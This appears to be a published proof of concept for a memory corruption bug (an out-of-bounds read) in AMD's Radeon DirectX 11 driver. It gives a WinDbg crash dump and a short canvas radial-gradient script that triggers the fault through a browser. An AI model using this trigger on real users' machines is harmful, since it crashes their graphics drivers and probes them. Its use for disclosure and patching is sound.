/* Title : Advanced Micro Devices, Inc. Radeon DirectX 11 Driver (Firefox/MS Edge) Memory Corruption Date : 10.04.2020 Exploit Author : Marcin Ressel Vendor Homepage : https://www.amd.com/ Software Link: n/a Version: 8.17.10.0871 (atidxx64.dll) Tested on: Windows 10 home, AMD64 Family 23 Model 24 Stepping 1 AuthenticAMD ~2100 Mhz, Firefox 74.0 (64 bity) MS Edge ---- 24a5122ef60 - 24a512270f0 = 0x7E70 && 0x7f10 - 0x7E70 = A0 = offset = OUT_OF_BOUNDS READ ---- 0:123> g (2560.1f28): Access violation - code c0000005 (!!! second chance !!!) atidxx64!AmdDxGsaFreeCompiledShader+0x45901d: 00007ffc`994cfecd 83bba000000013 cmp dword ptr [rbx+0A0h],13h ds:0000024a`5122f000=???????? 0:123> !heap -p -a @rbx 24a512270f0 address 0000024a5122ef60 found in _DPH_HEAP_ROOT @ 24a50701000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 24a653f10d0: 24a512270f0 7f10 - 24a51227000 9000 00007ffca7204847 ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007ffca71b4a16 ntdll!RtlpAllocateHeap+0x0000000000077b26 00007ffca713babb ntdll!RtlpAllocateHeapInternal+0x00000000000001cb 00007ffc99378a05 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000301b55 00007ffc996af263 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000006383b3 00007ffc996ae802 atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000637952 00007ffc993e9891 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003729e1 00007ffc9917a7db atidxx64!AmdDxGsaFreeCompiledShader+0x000000000010392b 00007ffc9917949b atidxx64!AmdDxGsaFreeCompiledShader+0x00000000001025eb 00007ffc99169680 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000f27d0 00007ffc99148e8a atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000d1fda 00007ffc990951f4 atidxx64!AmdDxGsaFreeCompiledShader+0x000000000001e344 00007ffc998509ce atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d9b1e 00007ffc9984b950 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007d4aa0 00007ffc99826a26 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000007afb76 00007ffc990aedcb 
atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000037f1b 00007ffc990ae6a9 atidxx64!AmdDxGsaFreeCompiledShader+0x00000000000377f9 00007ffc99952114 atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x00000000000a4654 00007ffca6747bd4 KERNEL32!BaseThreadInitThunk+0x0000000000000014 00007ffca716ced1 ntdll!RtlUserThreadStart+0x0000000000000021 0:123> kb # RetAddr : Args to Child : Call Site 00 00007ffc`994b4f3e : 0000024a`5122db98 0000024a`50dcef01 0000024a`5c27b600 0000024a`51228650 : atidxx64!AmdDxGsaFreeCompiledShader+0x45901d 01 00007ffc`99166094 : 0000024a`00000000 0000024a`00000000 0000024a`51211fc0 00000056`0743ec89 : atidxx64!AmdDxGsaFreeCompiledShader+0x43e08e 02 00007ffc`9917a1d3 : 0000024a`5122db80 0000024a`51211fc0 0000024a`0000002d 0000024a`51211fc0 : atidxx64!AmdDxGsaFreeCompiledShader+0xef1e4 03 00007ffc`99169680 : 0000024a`60901a50 0000024a`50e63108 00000000`00000002 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0x103323 04 00007ffc`99148e8a : 0000024a`60901a50 0000024a`50ddb1f0 0000024a`50dd6400 0000024a`60901a50 : atidxx64!AmdDxGsaFreeCompiledShader+0xf27d0 05 00007ffc`990951f4 : 00000000`00000001 0000024a`50dd6400 0000024a`50ddb1f0 0000024a`50ae0ec0 : atidxx64!AmdDxGsaFreeCompiledShader+0xd1fda 06 00007ffc`998509ce : 00000000`00000000 00000056`0743f5a0 0000024a`50dd6400 0000024a`5085c4c0 : atidxx64!AmdDxGsaFreeCompiledShader+0x1e344 07 00007ffc`9984b950 : 0000024a`00000000 0000024a`507d7d08 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d9b1e 08 00007ffc`99826a26 : 00000000`00000000 00000000`00000000 0000024a`50cfafe0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7d4aa0 09 00007ffc`990aedcb : 0000024a`50cfafe0 00000000`00000000 0000024a`5dc8ffd0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7afb76 0a 00007ffc`990ae6a9 : 00000000`00000000 0000024a`57423fd0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x37f1b 0b 00007ffc`99952114 : 0000024a`57423fd0 00000000`00000000 
00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x377f9
0c 00007ffc`a6747bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0xa4654
0d 00007ffc`a716ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0e 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 */

// Minimal reproducer for the atidxx64.dll fault documented in the header
// above.  A 2D canvas radial gradient is built with an end circle centred at a
// fractional y coordinate and then used as the stroke style for an arc with
// the same centre.  Per the header's crash dump the access violation is raised
// inside the driver (a read past the end of a heap block), not in browser
// code, so the remedy is a driver update.  The script computes nothing and
// exposes no result; its only effects are the DOM insertion and the drawing
// calls below.

const surface = document.createElement('canvas');
document.body.appendChild(surface);
const ctx = surface.getContext('2d');

// y coordinate shared by the gradient's end circle and the arc's centre.
const CENTER_Y = 0.6898449305444956;

/**
 * Create the radial gradient used as the stroke style.
 * Start circle: (1, 1) radius 0; end circle: (1, CENTER_Y) radius 1.
 * @returns {CanvasGradient} gradient with a single colour stop at offset 0
 */
function radioActiveGradient() {
  const gradient = ctx.createRadialGradient(1, 1, 0, 1, CENTER_Y, 1);
  gradient.addColorStop(0, 'rgb(1,1,1)');
  return gradient;
}

ctx.arc(1, CENTER_Y, 1, 0, 1);
ctx.strokeStyle = radioActiveGradient();
ctx.stroke();